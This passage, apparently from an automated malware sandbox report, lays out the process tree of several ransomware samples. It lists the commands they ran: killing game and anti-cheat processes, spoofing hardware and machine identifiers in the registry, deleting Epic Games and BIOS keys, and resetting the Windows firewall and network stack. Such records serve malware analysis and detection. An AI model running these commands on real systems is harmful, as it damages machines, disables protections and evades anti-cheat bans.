                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2072 -s 352
                                                                                                          5⤵
                                                                                                          • Program crash
                                                                                                          PID:7196
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2072 -s 356
                                                                                                          5⤵
                                                                                                          • Program crash
                                                                                                          PID:5704
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2072 -s 372
                                                                                                          5⤵
                                                                                                          • Program crash
                                                                                                          PID:6668
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2072 -s 652
                                                                                                          5⤵
                                                                                                          • Program crash
                                                                                                          PID:4960
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2072 -s 692
                                                                                                          5⤵
                                                                                                          • Program crash
                                                                                                          PID:4896
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2072 -s 692
                                                                                                          5⤵
                                                                                                          • Program crash
                                                                                                          PID:2176
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2072 -s 712
                                                                                                          5⤵
                                                                                                          • Program crash
                                                                                                          PID:7864
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2072 -s 716
                                                                                                          5⤵
                                                                                                          • Program crash
                                                                                                          PID:7092
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2072 -s 712
                                                                                                          5⤵
                                                                                                          • Program crash
                                                                                                          PID:4388
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2072 -s 848
                                                                                                          5⤵
                                                                                                          • Program crash
                                                                                                          PID:5304
                                                                                                    • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.WannaRen.i-195d8e3ba33b976cd661d7526daaae4852c6330bd6bb1ff7646cd7f2c0f1ad3f.exe
                                                                                                      Trojan-Ransom.Win32.WannaRen.i-195d8e3ba33b976cd661d7526daaae4852c6330bd6bb1ff7646cd7f2c0f1ad3f.exe
                                                                                                      3⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:3404
                                                                                                      • C:\Users\Public\eh\OSDUtility.exe
                                                                                                        "C:\Users\Public\eh\OSDUtility.exe"
                                                                                                        4⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:6084
                                                                                                        • C:\Users\Public\eh\Everything\Everything.exe
                                                                                                          "C:\Users\Public\eh\Everything\Everything.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Enumerates connected drives
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:6300
                                                                                                    • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Xorist.lk-a979d5ccddf18f11bc9db3822def9b6d15c40f7962ece670882566e9287c7c3d.exe
                                                                                                      Trojan-Ransom.Win32.Xorist.lk-a979d5ccddf18f11bc9db3822def9b6d15c40f7962ece670882566e9287c7c3d.exe
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Adds Run key to start application
                                                                                                      • Drops file in Program Files directory
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Modifies registry class
                                                                                                      PID:6036
                                                                                                    • C:\Users\Admin\Desktop\00384\VHO-Trojan-Ransom.Win32.Encoder.gen-a9f73364abb72b0d781dc2fe2cfa1e073ab02649fceb45e88eb8dc3f2546911a.exe
                                                                                                      VHO-Trojan-Ransom.Win32.Encoder.gen-a9f73364abb72b0d781dc2fe2cfa1e073ab02649fceb45e88eb8dc3f2546911a.exe
                                                                                                      3⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:6584
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\599F.tmp\59A0.tmp\59A1.bat C:\Users\Admin\Desktop\00384\VHO-Trojan-Ransom.Win32.Encoder.gen-a9f73364abb72b0d781dc2fe2cfa1e073ab02649fceb45e88eb8dc3f2546911a.exe"
                                                                                                        4⤵
                                                                                                          PID:456
                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                            taskkill /f /im "EpicGamesLauncher.exe" /t /fi "status eq running"
                                                                                                            5⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:3544
                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                            taskkill /f /im "FortniteLauncher.exe" /t /fi "status eq running"
                                                                                                            5⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:2036
                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                            taskkill /f /im "FortniteClient-Win64-Shipping_BE.exe" /t /fi "status eq running"
                                                                                                            5⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:3728
                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                            taskkill /f /im "FortniteClient-Win64-Shipping.exe" /t /fi "status eq running"
                                                                                                            5⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:4336
                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                            taskkill /f /im "EasyAntiCheat.exe" /t /fi "status eq running"
                                                                                                            5⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:5952
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d XSpoofer18856 /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:6600
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d XSpoofer24807 /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:4856
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {be6234} /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:6052
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {fefefee3613-23918-3805-18653} /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:1804
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {fefefe27296-9727-8735-12918} /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:3848
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d XSpoofer1272 /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:4960
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOwner /t REG_SZ /d XSpoofer3537 /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:5104
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOrganization /t REG_SZ /d XSpoofer4443 /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:6180
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d XSpoofer3821-5724-30096-21917 /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:1808
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d hello25064-1893-2241-31847 /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:7136
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d 4788-12994-17830-8195 /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:3456
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d 21314 /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:6220
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {randomd16430-15457-14872-30832} /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:2860
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {BE11167} /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:1328
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {18779-1148-10122-19648} /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:5432
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {20199-23625-32017-29346} /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:2044
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 12835 /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:8152
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOwner /t REG_SZ /d 23347 /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:5804
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOrganization /t REG_SZ /d 4283 /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:3572
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 26542-7967-6936-31418 /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:3744
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 29151-22594-22489-15937 /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:8116
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d 9006-5353-25449-15685 /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:2324
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d 3661 /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:6932
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {13136-8227-6529-13207} /f
                                                                                                            5⤵
                                                                                                            • Modifies registry key
                                                                                                            PID:2516
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg delete "HKEY_CURRENT_USER\Software\Epic Games" /f
                                                                                                            5⤵
                                                                                                              PID:3972
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 16822-30049-9916-14920 /f
                                                                                                              5⤵
                                                                                                              • Modifies registry key
                                                                                                              PID:6516
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg delete "HKEY_CURRENT_USER\Software\Epic Games" /f
                                                                                                              5⤵
                                                                                                                PID:4348
                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                taskkill /IM "EpicGamesLauncher.exe" /F
                                                                                                                5⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:8148
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg delete "HKEY_USERS\S-1-5-21-2097722829-2509645790-3642206209-1001\Software\Epic Games" /f
                                                                                                                5⤵
                                                                                                                  PID:5092
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg delete "HKEY_CURRENT_USER\Software\Epic Games" /f
                                                                                                                  5⤵
                                                                                                                    PID:6148
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg delete "HKEY_CURRENT_USER\Software\Epic Games" /f
                                                                                                                    5⤵
                                                                                                                      PID:5624
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg delete "HKEY_CURRENT_USER\Software\WOW6432Node\Epic Games" /f
                                                                                                                      5⤵
                                                                                                                        PID:4664
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg delete "HKEY_CURRENT_USER\Software\Classes\com.epicgames.launcher" /f
                                                                                                                        5⤵
                                                                                                                          PID:5908
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg delete "HKEY_CURRENT_USER\Software\Epic Games\Unreal Engine\Identifiers" /f
                                                                                                                          5⤵
                                                                                                                            PID:7284
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg delete "HKEY_CURRENT_USER\Software\Epic Games\Unreal Engine\Hardware Survey" /f
                                                                                                                            5⤵
                                                                                                                              PID:7396
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg delete "HKEY_CURRENT_USER\Software\Epic Games" /f
                                                                                                                              5⤵
                                                                                                                                PID:3492
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg delete "HKEY_CURRENT_USER\Software\Epic Games" /f
                                                                                                                                5⤵
                                                                                                                                  PID:2220
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg delete "HKEY_CURRENT_USER\Software\WOW6432Node\Epic Games" /f
                                                                                                                                  5⤵
                                                                                                                                    PID:7340
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg delete "HKEY_CURRENT_USER\Software\Classes\com.epicgames.launcher" /f
                                                                                                                                    5⤵
                                                                                                                                      PID:6676
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg delete "HKEY_CURRENT_USER\Software\Epic Games\Unreal Engine\Hardware Survey" /f
                                                                                                                                      5⤵
                                                                                                                                        PID:1808
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg delete "HKEY_CURRENT_USER\Software\Epic Games\Unreal Engine\Identifiers" /f
                                                                                                                                        5⤵
                                                                                                                                          PID:8108
                                                                                                                                        • C:\Windows\system32\attrib.exe
                                                                                                                                          attrib /s /d -s -h C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\*
                                                                                                                                          5⤵
                                                                                                                                          • Views/modifies file attributes
                                                                                                                                          PID:1364
                                                                                                                                        • C:\Windows\system32\attrib.exe
                                                                                                                                          attrib /s /d -s -h C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\*
                                                                                                                                          5⤵
                                                                                                                                          • Views/modifies file attributes
                                                                                                                                          PID:3744
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg delete "HKEY_CURRENT_USER\Software\Epic Games\Unreal Engine\Hardware Survey" /f
                                                                                                                                          5⤵
                                                                                                                                            PID:5968
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg delete "HKEY_CURRENT_USER\Software\Epic Games\Unreal Engine\Identifiers" /f
                                                                                                                                            5⤵
                                                                                                                                              PID:5088
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg delete "HKEY_CLASSES_ROOT\com.epicgames.launcher" /f
                                                                                                                                              5⤵
                                                                                                                                                PID:6056
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\com.epicgames.launcher" /f
                                                                                                                                                5⤵
                                                                                                                                                  PID:5552
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Epic Games" /f
                                                                                                                                                  5⤵
                                                                                                                                                    PID:2328
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\EpicGames" /f
                                                                                                                                                    5⤵
                                                                                                                                                      PID:2420
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\EpicGames" /f
                                                                                                                                                      5⤵
                                                                                                                                                        PID:2360
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Epic Games" /f
                                                                                                                                                        5⤵
                                                                                                                                                          PID:3604
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          reg delete "HKEY_CURRENT_USER\SOFTWARE\Epic Games" /f
                                                                                                                                                          5⤵
                                                                                                                                                            PID:6352
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            reg delete "HKEY_CURRENT_USER\SOFTWARE\EpicGames" /f
                                                                                                                                                            5⤵
                                                                                                                                                              PID:6332
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              reg delete "HKEY_CURRENT_USER\Software\Classes\Installer\Dependencies" /v MSICache /f
                                                                                                                                                              5⤵
                                                                                                                                                                PID:4616
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                reg delete "HKEY_CURRENT_USER\Software\Microsoft\Direct3D" /v WHQLClass /f
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:4844
                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                  reg delete "HKEY_LOCAL_MACHINE\Hardware\Description\System\BIOS" /v BIOSVendor /f
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:7004
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg delete "HKEY_LOCAL_MACHINE\Hardware\Description\System\BIOS" /v BIOSReleaseDate /f
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:2576
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg delete "HKEY_LOCAL_MACHINE\Hardware\Description\System\BIOS" /v SystemManufacturer /f
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:1600
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        reg delete "HKEY_LOCAL_MACHINE\Hardware\Description\System\BIOS" /v SystemProductName /f
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:7148
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          reg delete "HKEY_LOCAL_MACHINE\Hardware\Description\System\BIOS" /v SystemManufacturer /f
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:1272
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg delete "HKEY_LOCAL_MACHINE\Hardware\Description\System\CentralProcessor\0" /v ProcessorNameString /f
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:7436
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg delete "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control" /v SystemStartOptions /f
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:5256
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v InstallDate /t REG_SZ /d 8892 /f
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:5248
                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                  REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductId /t REG_SZ /d 29258 /f
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:6720
                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                    REG ADD HKLM\System\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d 21070 /f
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                                    PID:5516
                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                    REG ADD HKLM\System\CurrentControlSet\Control\WMI\Security /v 671a8285-4edb-4cae-99fe-69a15c48c0bc /t REG_SZ /d 18921 /f
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                                    PID:5456
                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                    reg delete "HKEY_USERS\S-1-5-21-2097722829-2509645790-3642206209-1001\Software\Epic Games" /f
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:5136
                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig" /f
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:6312
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        REG ADD HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate /t REG_SZ /d 20751 /f
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Modifies registry key
                                                                                                                                                                                        PID:4784
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        REG ADD HKLM\Software\Microsoft\Windows NT\CurrentVersion /v ProductId /t REG_SZ /d 4843 /f
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Modifies registry key
                                                                                                                                                                                        PID:4244
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        REG ADD HKLM\System\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d 9185 /f
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Modifies registry key
                                                                                                                                                                                        PID:7904
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        REG ADD HKLM\System\CurrentControlSet\Control\WMI\Security /v 671a8285-4edb-4cae-99fe-69a15c48c0bc /t REG_SZ /d 6159 /f
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Modifies registry key
                                                                                                                                                                                        PID:5708
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        reg delete "HKEY_USERS\S-1-5-21-2097722829-2509645790-3642206209-1001\Software\Epic Games" /f
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:5908
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d XSpoofer1606 /f
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Modifies registry key
                                                                                                                                                                                          PID:6308
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d XSpoofer23434 /f
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Modifies registry key
                                                                                                                                                                                          PID:3228
                                                                                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                                                                                          netsh advfirewall reset
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                          PID:2260
                                                                                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                                                                                          netsh int ipv6 reset
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:4960
                                                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                                                            netsh winsock reset
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:5504
                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                              netsh int ip reset
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:1788
                                                                                                                                                                                              • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                                                ipconfig /release
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Gathers network information
                                                                                                                                                                                                PID:7824
                                                                                                                                                                                              • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                                                ipconfig /renew
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Gathers network information
                                                                                                                                                                                                PID:7396
                                                                                                                                                                                              • C:\Windows\system32\ipconfig.exe
                                                                                                                                                                                                ipconfig /flushdns
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Gathers network information
                                                                                                                                                                                                PID:7352
                                                                                                                                                                                          • C:\Users\Admin\Desktop\00384\VHO-Trojan-Ransom.Win32.Gen.gen-eddb45dfe783cb38e0597ba1a04b8fe9cdc126970dba9287f7325e05f62329ce.exe
                                                                                                                                                                                            VHO-Trojan-Ransom.Win32.Gen.gen-eddb45dfe783cb38e0597ba1a04b8fe9cdc126970dba9287f7325e05f62329ce.exe
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:5340
                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                        explorer.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:2500
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2516 -ip 2516
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:5432
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2964 -ip 2964
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:5452
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4936 -ip 4936
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:5996
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4936 -ip 4936
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:5948
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4936 -ip 4936
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:6148
                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:5532
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4936 -ip 4936
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:5680
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4936 -ip 4936
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:5228
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5008 -ip 5008
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:6700
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4936 -ip 4936
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:6628
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4936 -ip 4936
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:5976
